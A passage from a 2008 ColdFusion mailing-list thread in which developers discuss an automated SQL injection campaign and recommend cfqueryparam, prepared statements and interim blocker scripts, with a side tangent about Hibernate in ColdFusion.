first I have seen of it > > on my server.> > This is the first
large-scale automated SQL injection attack. Automated> attacks have been
around for a long time, as have SQL injection attacks.> > Honestly, this
current attack is just a nuisance. SQL injection attacks are> usually more
destructive, in that they often involve the theft of sensitive> data. In those
cases, of course, the attack is manual rather than automated.> But if your
site is vulnerable to this automated attack, it has always been> vulnerable to
these manual, destructive attacks - which may have already> occurred without
your knowledge.> > Dave Watts, CTO, Fig Leaf Software> http://www.figleaf.com/>; > Fig Leaf Software provides
the highest caliber vendor-authorized> instruction at our training centers in
Washington DC, Atlanta,> Chicago, Baltimore, Northern Virginia, or on-site at
your location.> Visit http://training.figleaf.com/ for more information!> >
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311330
Right on Dave... That's a point I've been making as well.
It is the SQL injection attacks that don't "obviously" do anything that are
more insidious. For those of you who have found your sites vulnerable, this
attack is not the one that should be keeping you up at night. Instead, it
should be those attacks that came in and left with your data without
arousing any alarm at all :)
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
> Does this thing just raise it's ugly head every now and then and go
> away for a while? This is the first I have seen of it on my server.
This is the first large-scale automated SQL injection attack. Automated
attacks have been around for a long time, as have SQL injection attacks.
Honestly, this current attack is just a nuisance. SQL injection attacks are
usually more destructive, in that they often involve the theft of sensitive
data. In those cases, of course, the attack is manual rather than automated.
But if your site is vulnerable to this automated attack, it has always been
vulnerable to these manual, destructive attacks - which may have already
occurred without your knowledge.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized instruction
at our training centers in Washington DC, Atlanta, Chicago, Baltimore,
Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311331
Eric,
A good answer might be .... "it is now" :)
>is <cfqueryparam> something a lot of programmers really use?
Only the good ones. ;)
Thanks,
Eric
David Moore, Jr. wrote:
> When you say "Update Your Code", are you saying using <cfqueryparam>?
But
even so, the SQL injection still will use up countless resources instead of
cutting it off early. So, go back and fix 1,000's of lines of code I have
developed over the last 'upteen' years or stop it before it starts? Is this
something new to CF8 or just a necessary evil because of SQL Injection
Attacks.
>
> Not trying to pick a fight, becuase I am sure you have forgotten more code
than I will ever know (seriously) and I am probably just being lazy
(seriously), but is <cfqueryparam> something a lot of programmers really
use? I have never seen <cfqueryparam> used on any tags I have purchased or
exchanged and I am afraid all I know is what I have learned from books and
forums. This is the first I have ever heard of using <cfqueryparam>.
----- Excess quoted text cut - see Original Post for more -----
otential for false > positives (though it's improved recently from what I
can tell).> > SQLPrev has a version compatible with CF5 for those who need
it where > the other script relies on CFMX functions to run. I'm not saying
one is > better than the other, they both get the job done. Just use
whatever > works best for you, and update your code so that you don't need
either > of them <g>.> > > -Justin Scott> > > >
>
>
Author: Eric Cobb
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311329
>is <cfqueryparam> something a lot of programmers really use?
Only the good ones. ;)
Thanks,
Eric
David Moore, Jr. wrote:
----- Excess quoted text cut - see Original Post for more -----
otential for false > positives (though it's improved recently from what I can
tell).> > SQLPrev has a version compatible with CF5 for those who need it
where > the other script relies on CFMX functions to run. I'm not saying one
is > better than the other, they both get the job done. Just use whatever >
works best for you, and update your code so that you don't need either > of
them <g>.> > > -Justin Scott> > > >
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311328
Justin,
I certainly don't feel picked on. I feel blessed to have a place where I can
learn from people who do know so much. And you are right. I (we) only seem to
learn under fire. I am a one man business owner in a small town with limited
resources and time. 10 hour days, work weekends, what is family time except
coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So,
what do we do?
I am a little embarrassed to say I didn't know, but at least in honesty I can
learn and get a complete picture.
So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post????
Thanks everyone!
~David G. Moore, Jr.
P.S. Speaking of Smack Down's. Mary Jo's got a great right cross :) Go get'em
girl!> Subject: Re: SQL injection attack on House of Fusion> From:
jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug
2008 17:41:12 -0400> > > When you say "Update Your Code", are you saying
using <cfqueryparam>? But even so, the SQL injection still will use up
countless resources instead of cutting it off early. So, go back and fix 1,000's
of lines of code I have developed over the last 'upteen' years or stop it before
it starts? Is this something new to CF8 or just a necessary evil because of SQL
Injection Attacks. > > Essentially, yes, code should be using cfqueryparam
and other secure > coding methods to keep the baddies out. The resources will
get used > either way, really. You can either rely on a filter up-front and
use up > CPU cycles regardless of whether a user is legitimate or not, or even
> whether or not a query is being run in the page or not, etc. Or, you >
can implement cfqueryparam where appropriate and only use those cycles > where
they're needed, and you'll get the added benefit of prepared > statements on
the SQL Server in most cases and the queries will run > slightly faster as a
result. Either way you go, protect yourself and > your clients.> > SQL
injection attacks have been around since before I got started in web >
development, and secure coding against them has been a best practice > just as
long. I remember updating "old" CF code I inherited way back > when I was
using ColdFusion 4, so it's certainly nothing new.> > It's unfortunate that
you haven't seen this in practice until now, but > it really is something you
should be doing. It's been my observation > over the years that web
programmers in general (not just limited to > ColdFusion) tend to learn about
security only when there is a breach of > some kind, and then have to scramble
to learn under fire. Just as an > example, how many out there run e-commerce
applications and have never > heard of PCI-DSS?> > I'm not picking on
you specifically, David, so please don't think I'm > calling you out or
anything. I'm always learning new things myself, but > we web developers need
to collectively get more educated about the risks > and threats we face and
alter our practice accordingly.> > > -Justin Scott> > > >
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311327
> Does this thing just raise it's ugly head every now and then
> and go away for a while? This is the first I have seen of it
> on my server.
This is the first large-scale automated SQL injection attack. Automated
attacks have been around for a long time, as have SQL injection attacks.
Honestly, this current attack is just a nuisance. SQL injection attacks are
usually more destructive, in that they often involve the theft of sensitive
data. In those cases, of course, the attack is manual rather than automated.
But if your site is vulnerable to this automated attack, it has always been
vulnerable to these manual, destructive attacks - which may have already
occurred without your knowledge.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Kelly
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311326
As someone who was hit by the attack on the first day. I will say I've
used cfqueryparam for years and yet I had a handful of pages with old
code where I was not using cfqueryparam. It just takes one page that's
publically accessible to do damage. Once I fixed the pages in question,
try as they might, I have not been effected since.
Using cfqueryparam is a good habit to get into, to protect your sites
and client sites. I was also running a forum program I purchased years
ago CFForum2000 I think, and all the code in that product was not using
cfqueryparam either. I had to go through and edit the code throughout.
It's possible their newer versions are using proper coding but it was a
bit of a pain, and really my own fault for not rechecking that code long
ago.
Kelly
David Moore, Jr. wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311325
> When you say "Update Your Code", are you saying using <cfqueryparam>?
But even so, the SQL injection still will use up countless resources instead of
cutting it off early. So, go back and fix 1,000's of lines of code I have
developed over the last 'upteen' years or stop it before it starts? Is this
something new to CF8 or just a necessary evil because of SQL Injection Attacks.
Essentially, yes, code should be using cfqueryparam and other secure
coding methods to keep the baddies out. The resources will get used
either way, really. You can either rely on a filter up-front and use up
CPU cycles regardless of whether a user is legitimate or not, or even
whether or not a query is being run in the page or not, etc. Or, you
can implement cfqueryparam where appropriate and only use those cycles
where they're needed, and you'll get the added benefit of prepared
statements on the SQL Server in most cases and the queries will run
slightly faster as a result. Either way you go, protect yourself and
your clients.
SQL injection attacks have been around since before I got started in web
development, and secure coding against them has been a best practice
just as long. I remember updating "old" CF code I inherited way back
when I was using ColdFusion 4, so it's certainly nothing new.
It's unfortunate that you haven't seen this in practice until now, but
it really is something you should be doing. It's been my observation
over the years that web programmers in general (not just limited to
ColdFusion) tend to learn about security only when there is a breach of
some kind, and then have to scramble to learn under fire. Just as an
example, how many out there run e-commerce applications and have never
heard of PCI-DSS?
I'm not picking on you specifically, David, so please don't think I'm
calling you out or anything. I'm always learning new things myself, but
we web developers need to collectively get more educated about the risks
and threats we face and alter our practice accordingly.
-Justin Scott
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311324
And this is where I am. I have been using CF since 4.5. Very Scary. Glad I have
found this list. I am sure to learn a lot. I will try to read and not bother.
Thanks for the SMACK DOWN. I will start to write it in and become more learned. I
can say, just in the last weeks since joining I have learned a lot.
~David G. Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion>
From: pc@oakcitygraphics.com> To: cf-talk@houseoffusion.com> Date: Wed, 20
Aug 2008 14:35:19 -0700> > > Not trying to pick a fight, becuase I am
sure you have forgotten more code > > than I will ever know (seriously) and
I am probably just >being lazy > > (seriously), but is
<cfqueryparam> something a lot of programmers really > > use? I have
never seen <cfqueryparam> used on >any tags I have purchased > >
or exchanged and I am afraid all I know is what I have learned from books >
> and forums. This is the first I >have ever heard of using
<cfqueryparam>.> > It depends on what you mean by "a lot". But, if
you'd been hanging out on > this list at all, you'd have heard of
cfqueryparam. It's discussed quite > often. But, since most people learn
ColdFusion on their own, and it's not a > "necessary" tag to know about to get
things done, you could go for years > without using it or even understanding
why it's needed.> > -- Josh> > > >
Author: Josh Nathanson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311323
> Not trying to pick a fight, becuase I am sure you have forgotten more code
----- Excess quoted text cut - see Original Post for more -----
It depends on what you mean by "a lot". But, if you'd been hanging out on
this list at all, you'd have heard of cfqueryparam. It's discussed quite
often. But, since most people learn ColdFusion on their own, and it's not a
"necessary" tag to know about to get things done, you could go for years
without using it or even understanding why it's needed.
-- Josh
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311322
David Moore, Jr. wrote:
> Not trying to pick a fight, becuase I am sure you have forgotten more code
than I will ever know (seriously) and I am probably just being lazy (seriously),
but is <cfqueryparam> something a lot of programmers really use? I have
never seen <cfqueryparam> used on any tags I have purchased or exchanged
and I am afraid all I know is what I have learned from books and forums. This is
the first I have ever heard of using <cfqueryparam>.
Yes <cfqueryparam...> is well used and for very good reasons. One of
which is what do you want to happen if the next clever hacker comes
along with an attack that gets around all these solutions that have been
developed to stop them at the gate? Do you really want to gamble your
data and possible career on that fact that you can out guess every
hacker who collectively have almost endless time and resources to figure
out ways around these solutions?
I equate it to this analogy I have been dying to use for some time.
Would you never build the city walls and gates just because you have
sentries watching the road? No matter how good and undefeatable you
think your sentries are.
Or why have database passwords if you have a firewall. (That one might
be better)
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311321
> When you say "Update Your Code", are you saying using <cfqueryparam>?
Yes, that's what he is saying.
> so, go back and fix 1,000's of lines
> of code I have developed over the last 'upteen' years or stop it
> before it starts?
Because if you don't, you are putting a LOT of faith in these blockers and
assuming that hackers won't find other ways to attack a vulnerable application
that doesn't get by them. Personally, I'm not sure I'd put *that* much trust in
them, if I really cared about my sites being safe.
> Is this something new to CF8 or just a necessary
> evil because of SQL Injection Attacks.
Nothing new, and certainly not unique to ColdFusion either.
> is <cfqueryparam> something a lot of programmers
> really use?
Uh, yes.
> This is the first I have ever heard of using <cfqueryparam>.
That is a truly scary thought. I hope you will spend some time on the ColdFusion
blogs which have lots of information on the importance of using it.
--- Mary Jo
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311320
When you say "Update Your Code", are you saying using <cfqueryparam>? But
even so, the SQL injection still will use up countless resources instead of
cutting it off early. So, go back and fix 1,000's of lines of code I have
developed over the last 'upteen' years or stop it before it starts? Is this
something new to CF8 or just a necessary evil because of SQL Injection Attacks.
Not trying to pick a fight, becuase I am sure you have forgotten more code than I
will ever know (seriously) and I am probably just being lazy (seriously), but is
<cfqueryparam> something a lot of programmers really use? I have never seen
<cfqueryparam> used on any tags I have purchased or exchanged and I am
afraid all I know is what I have learned from books and forums. This is the first
I have ever heard of using <cfqueryparam>.
~David G. Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion>
From: jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20
Aug 2008 17:01:42 -0400> > > I am currently using the SQLprev.cfm from
Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but
was wondering what the difference would be with this one. I am not looking to
start a "my SQL Injection blocker is better than yours", yet trying to educate
myself on just what is going on and what is best to do. > > My original
SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt)
> just checks for basic SQL keywords with a semicolon in URL variables. >
It's a quick and dirty way to give you some protection from bots > short-term
while your code base is updated to use best practices and > secure coding
methods. Mary Jo's is more thorough in that it checks > additional variable
scopes, and can help protect better against > hand-drafted attacks, but may
have a higher potential for false > positives (though it's improved recently
from what I can tell).> > SQLPrev has a version compatible with CF5 for
those who need it where > the other script relies on CFMX functions to run.
I'm not saying one is > better than the other, they both get the job done.
Just use whatever > works best for you, and update your code so that you don't
need either > of them <g>.> > > -Justin Scott> > >
>
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311317
> I am currently using the SQLprev.cfm from Jochem to stop the onslaught of
superfluous bandwidth suckage from my server, but was wondering what the
difference would be with this one. I am not looking to start a "my SQL Injection
blocker is better than yours", yet trying to educate myself on just what is going
on and what is best to do.
My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt)
just checks for basic SQL keywords with a semicolon in URL variables.
It's a quick and dirty way to give you some protection from bots
short-term while your code base is updated to use best practices and
secure coding methods. Mary Jo's is more thorough in that it checks
additional variable scopes, and can help protect better against
hand-drafted attacks, but may have a higher potential for false
positives (though it's improved recently from what I can tell).
SQLPrev has a version compatible with CF5 for those who need it where
the other script relies on CFMX functions to run. I'm not saying one is
better than the other, they both get the job done. Just use whatever
works best for you, and update your code so that you don't need either
of them <g>.
-Justin Scott
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311314
> I am currently using the SQLprev.cfm from Jochem to stop the onslaught
> of superfluous bandwidth suckage from my server, but was wondering
> what the difference would be with this one.
Since I am not familiar with his, I cannot say what the difference would be. I
did include URL, form, cookie and common CGI variables into mine as well so it's
pretty comprehensive for both this attack and others that might start looking for
other vulnerable areas. It uses Gabriel's method of leveraging the java regex
pattern matcher which seems to give better performance and less likely to hang on
large strings than with CF. Luis Melo who contributed the RegEx that I am now
using has his own SQLi blocker as well that includes a bunch of additional
functions (such as keeping a list of blacklisted IP addresses in application
memory) which some people may like as well. My goal was to just try and put
something together that could easily be dropped in any application and do its
thing with fairly minimal overhead.
> Does this thing just raise it's ugly head every now and then and go
> away for a while? This is the first I have seen of it on my server.
This particular attack? It does seem to come and go. I have no doubt the hackers
will look for other avenues to exploit once it seems that this one is no longer
having much effect.
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311313
I am currently using the SQLprev.cfm from Jochem to stop the onslaught of
superfluous bandwidth suckage from my server, but was wondering what the
difference would be with this one. I am not looking to start a "my SQL Injection
blocker is better than yours", yet trying to educate myself on just what is going
on and what is best to do.
Does this thing just raise it's ugly head every now and then and go away for a
while? This is the first I have seen of it on my server.
Thanks in advance,
~David G. Moore, Jr.
UpstateWeb, LLC> Subject: Re: SQL injection attack on House of Fusion>
From: maryjos@cfwebstore.com> To: cf-talk@houseoffusion.com> Date: Wed, 20
Aug 2008 14:36:46 -0400> > > I also had a concern about thread safety;
it's caching the java.util.> > regex.Matcher object in Application scope,
and calling Application.> > injChecker.reset(testvar) for each url/form/etc
variable -- seems like > > Matcher.reset() changes state of the cached
Matcher object? > > Thanks for pointing this out...I updated the tool on my
site to address this and also switched it to use a different RegEx that seems to
work better and throw less false positives. Same link to download as before:>
> http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18>;
> --- Mary Jo> > > > > > > >
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311311
> I also had a concern about thread safety; it's caching the java.util.
> regex.Matcher object in Application scope, and calling Application.
> injChecker.reset(testvar) for each url/form/etc variable -- seems like
> Matcher.reset() changes state of the cached Matcher object?
Thanks for pointing this out...I updated the tool on my site to address this and
also switched it to use a different RegEx that seems to work better and throw
less false positives. Same link to download as before:
http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18
--- Mary Jo
Author: David Moore
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311306
I am still getting around 50 to 75 attacks a day on about 20 of my websites. I
applied the solution from JOCHEM that aborts the attach in the application.cfm
file and then sends me an email.
They just keep coming from different IP addresses so it is useless to do anything
other than wait for the storm to pass and watch them eat up bandwidth.
In the words of one of my all time favorites....AUGH! (that would be Charlie
Brown for all you young ones)
David G. Moore, Jr.
UpstateWeb, LLC
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311277
Qing, when you use cfquery with cfqueryparam, a prepared statement is
generated. So basically, you will be making ASP do the same thing CF does.
CF just makes it easier. :)
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Qing Xia
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311271
Neat! Thanks Dave.
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311265
> What is the ASP equivalent of CFQUERYPARAM?
http://prepared-statement.blogspot.com/
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Qing Xia
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311257
Hello folks:
I am sorry about the thread jump here, but any ASP gurus out there on this
discussion list?
In the past week, I have been fanatically patching our old CF code and
applying CFQUERYPARAM wherever it applies. Additionally, I also implemented
the SQL Injection Blocker written by Gabriel and Mary Jo. It is extremely
helpful.
However, a big chunk of our old application is written in ASP. It was an
off-the-shelf content-mangement-system which we plan to replace soon. I
have no experience with ASP, but from the database being hit, it is pretty
certain that the injection must have come through the ASP code.
Is there a quick-and-dirty fix for ASP code regarding this sql injection?
Has anybody written the SQL injection blocker function in ASP? What is the
ASP equivalent of CFQUERYPARAM?
BTW, I know that another effective method would be to install a Web
Server injection filter--but that is not within my control and the only
thing I can do now is on the code side.
Thanks and any help will be most appreciated!
Qing Xia
On Sun, Aug 17, 2008 at 12:43 PM, Jochem van Dieten
<jochemd@oli.tudelft.nl>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311154
denstar wrote:
----- Excess quoted text cut - see Original Post for more -----
I don't think simple solutions exist. The closest I have seen that still
was simple yet appeared to be somewhat effective was a company that did
something akin to hungarian notation. They had all their variables typed
like user_uuid and article_int and they did type / bounds checking in
the webserver, throwing security errors on every type mismatch or
occurence of a variable without the type declared.
Jochem
Author: Justin D. Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311151
> Filtering means "allow unless it matches". A security
> measure should be "deny unless it matches".
I believe that depends on the proportion of wanted vs. unwanted items. On a
firewall, this is the best approach because there are far more ports that
you don't want to have available than there are that you do want available,
so a "deny everything and allow these few" approach is workable.
Trying to apply the same logic to URLs isn't workable in my opinion. With
dynamic web applications there are a virtually unlimited number of "good"
URLs that are possible, and only a handful that are undesirable. This is
especially true if you pass session tokens through the URL for session
management.
I can think of a few ways to implement a security system to allow only
"approved" URLs, but none of them are any more effective than using secure
coding methods to begin with. If you have a novel approach I'd be
interested in learning about it.
-Justin Scott
Author: Dave Francis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311150
>But hey I am not complaining...
Who are you, and why are you using Andrew's email address?
LoL...
At the end of the day I see hibernate as a great tool, and hasn't been
till recently that I discovered how easy it is to use. Not perfect or as
good as GORM...
But hey I am not complaining...
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311149
Yeah, well my personal blog is on a shared hosting. But it uses Ray's
BlogCFC, so I feel safe. The problem though is that I don't get to see the
logs for the server, and have to rely on the hosting provider. As cheap as
they are, I do feel safe believe it or not.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Andrew,
I need to check with my hosting provider to see if they've taken any
measures, but at least I'm on a VPS instead of shared hosting using MySQL.
After running my own server for 5 years and decided that the cost of
VPS's made it worth outsourcing the hosting again, I can't imagine going
back to shared hosting and putting up with the limitations. But sometimes,
it's necessary in some situations.
For now, it looks like I'm protected. But I know the time is coming.
Rick
> Rick,
>
> I think it is only a matter of time, I only have one ColdFusion website
that
----- Excess quoted text cut - see Original Post for more -----
glad
> I'm using MySQL. This would be one big, time-consuming headache,
otherwise.
>
> I'm a solo developer and can use whatever DB I prefer, but I realize some
> of you have to use the affected DB's.
>
> I'm sure the whole thing is nothing but aggravation, to the point of
wanting
----- Excess quoted text cut - see Original Post for more -----
http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevents
> > -sql-injection
> >
> > There are about 6 or 8 posts on the topic and links to many other blogs
as
----- Excess quoted text cut - see Original Post for more -----
years
> > and know some of you from the CF Forums.
> >
> > I am getting slammed with this crud as well on over 30 of my websites.
Any
----- Excess quoted text cut - see Original Post for more -----
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311148
Andrew,
I need to check with my hosting provider to see if they've taken any
measures, but at least I'm on a VPS instead of shared hosting using MySQL.
After running my own server for 5 years and decided that the cost of
VPS's made it worth outsourcing the hosting again, I can't imagine going
back to shared hosting and putting up with the limitations. But sometimes,
it's necessary in some situations.
For now, it looks like I'm protected. But I know the time is coming.
Rick
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311147
----- Excess quoted text cut - see Original Post for more -----
So long as it's simple list of matches, right? If the list is too
complicated, you get the Godel's Theorem effect, neh? :-)
Heh, I can see it now-- MG3 not only auto-generates your controllers
and XML and whatnot, but using the power of introspection, it adds
rewrite rules to your vhost conf file per event, with type-binding!
That actually sounds pretty cool.
See, I'm wondering if this is closer to searching than security,
per-se. Sorta thinking (it's getting late, so bear with me :) of a
lame example: I could parse a paragraph looking for every word that's
good, and tossing out the swear-words-- or just look for swear-words.
Which is going to be faster? Which list is longer?
Maybe that analogy is broken. Probably. Hmm... Yup, cause you'd have
to throw in that they could make up new curses as well, without you
even knowing. Hmm... Well, I'm sure you get the point I'm trying to
make by now (which could be a non-point), but I'll elaborate further,
because I'm not sure if it is a point :-)p
I'd want the lowest-level, most used to be the fastest checks, and the
highest level, least used to be the slowest, most thorough. In an
ideal world, you could run the highest all the time, but that might be
a fake world, because the more encrypted you get, the longer it takes,
not only to break, but to encode and decode. Maybe. Probably another
broken analogy (and a lie ta boot), but whatever. :)
Hmm... if you've got access to all the data at each level (what to
allow, say, in rewrite rules, or query parameters, etc.), I don't see
why you couldn't lock it down to only what's possible, vs. what could
be. It would take organization tho. Borg-like, Terminator-making
organization. :-)
Or maybe you've got a simple solution, to how one would limit URL
requests to only allowable values? I can't see anything short of
automation, but that's why this is taking so long. Probably
overlooking something simple.
Eh.
What's your scenario, to help me grok this here, Jochem? Search
Engine Safe? Ha! That's simple! Force a pattern-- string([A-z]),
number, string! Easy.
Is that a solve?
Damn. This, by now dead, horse is freaking beat. I'm going to sign off now...
--
slowly steps away from the keyboard...
--
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311146
LoL...
At the end of the day I see hibernate as a great tool, and hasn't been till
recently that I discovered how easy it is to use. Not perfect or as good as
GORM...
But hey I am not complaining...
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
> Well at the end of the day, I am currently using hibernate in ColdFusion
> thanks to Joe Reinhart I think is the one I am using. But I now plenty of
> people are looking into it at the moment.
Hibernate is easy to use with CF8 and Java. Few lines of code.
Now, CF objects and hibernate is another matter. :-)
The first thing I did was hook up HibernateTools (DB reverse
engineering into POJOs or HBMs), but I didn't feel that was right for
the majority of CF devs.
And Having to restart things to see changes and whatnot? Neh. Crazy
classloading-ness? Neh.
Hooking into a java-based model? Sure. Taking advantage of all the
awesome java tools? Priceless.
But it ain't CF, per-se. Not that that matters, of course, I just
decided I wanted it to, for kicks.
> I have even looked at using GORM in Coldfusion, to help with DDD. But
> haven't had the time to investigate as of yet. But I am very happy to even
> just use POJO's for now.
Right on. Looks like a GORM-ish deal wouldn't be hard to rock with
about any ORM.
When you talk about DDD, how are you representing the domain? Are you
using a modeling language?
Thanks,
DeN
--
Nothing except the mint can make money without advertising.
Thomas B. Macaulay
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311144
denstar wrote:
>
>> I haven't mentioned this before because I do believe that filtering
>> request URLs is the wrong approach
>
> Care to elaborate on this?
Filtering means "allow unless it matches". A security measure should be
"deny unless it matches".
Jochem
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311142
> Well at the end of the day, I am currently using hibernate in ColdFusion
> thanks to Joe Reinhart I think is the one I am using. But I now plenty of
> people are looking into it at the moment.
Hibernate is easy to use with CF8 and Java. Few lines of code.
Now, CF objects and hibernate is another matter. :-)
The first thing I did was hook up HibernateTools (DB reverse
engineering into POJOs or HBMs), but I didn't feel that was right for
the majority of CF devs.
And Having to restart things to see changes and whatnot? Neh. Crazy
classloading-ness? Neh.
Hooking into a java-based model? Sure. Taking advantage of all the
awesome java tools? Priceless.
But it ain't CF, per-se. Not that that matters, of course, I just
decided I wanted it to, for kicks.
> I have even looked at using GORM in Coldfusion, to help with DDD. But
> haven't had the time to investigate as of yet. But I am very happy to even
> just use POJO's for now.
Right on. Looks like a GORM-ish deal wouldn't be hard to rock with
about any ORM.
When you talk about DDD, how are you representing the domain? Are you
using a modeling language?
Thanks,
DeN
--
Nothing except the mint can make money without advertising.
Thomas B. Macaulay
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311141
Well at the end of the day, I am currently using hibernate in ColdFusion
thanks to Joe Reinhart I think is the one I am using. But I now plenty of
people are looking into it at the moment.
I have even looked at using GORM in Coldfusion, to help with DDD. But
haven't had the time to investigate as of yet. But I am very happy to even
just use POJO's for now.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
There are always trade-offs.
Everything you add is a few (or more) cycles, and you've got to at
least sorta aim for optimization (if ambiguously).
Like, the hibernate stuff seems plenty fast to me right now, but what
happens when I toss a ton of requests at it, or use large tables or
something?
It would be cool to have a switch to turn it on tho, and leave it on
by default. :-)
> No I am not arguing about it, I am saying that there is no reason that
> ColdFusion could not do what I said it could. It only means that with the
> release of ColdFusion 9, it is more of a possibility that SQL Injection
will
----- Excess quoted text cut - see Original Post for more -----
everyone
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311137
There are always trade-offs.
Everything you add is a few (or more) cycles, and you've got to at
least sorta aim for optimization (if ambiguously).
Like, the hibernate stuff seems plenty fast to me right now, but what
happens when I toss a ton of requests at it, or use large tables or
something?
It would be cool to have a switch to turn it on tho, and leave it on
by default. :-)
----- Excess quoted text cut - see Original Post for more -----
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311134
No I am not arguing about it, I am saying that there is no reason that
ColdFusion could not do what I said it could. It only means that with the
release of ColdFusion 9, it is more of a possibility that SQL Injection will
become a thing of the past for ColdFusion.
It doesn't excuse the fact that when cfqueryparam was introduced, it
couldn't have done something like this a long time ago.
The argument came about because people believed it was not possible for
ColdFusion to do this stuff under the hood, the reality was that it could
have a long time ago. It just never was a request or thought about before.
If you read anything I have said, you would see I am not arguing about it.
But making a statement that it was and could have been possible. Nothing
more nothing less. It was everyone else who disagreed, well almost everyone
else.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
So for six months you've known the feature is coming yet you're still
arguing about it now? Do you just like wasting people's time?
> Man your about 6 months late with that news....
>
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311131
Rick,
I think it is only a matter of time, I only have one ColdFusion website that
is on a shared server/public. I have been through the attacks, but when
speaking with the hosting provider I think they started to put measures in
place for the entire servers.
Not 100% sure, as I haven't seen these attacks for nearly 2 years. So I
